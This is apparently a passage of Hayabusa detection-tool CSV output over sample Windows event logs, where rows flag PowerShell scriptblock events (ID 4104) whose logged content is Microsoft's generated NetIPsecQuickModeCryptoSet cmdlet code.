NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeCryptoSet' -Alias '*' function Rename-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] 
${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery')",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.660 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"[ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeCryptoSet' -Alias '*' function Rename-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = 
$__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery')",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.660 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, 
$__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecQuickModeCryptoSet' -Alias '*' function Copy-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] 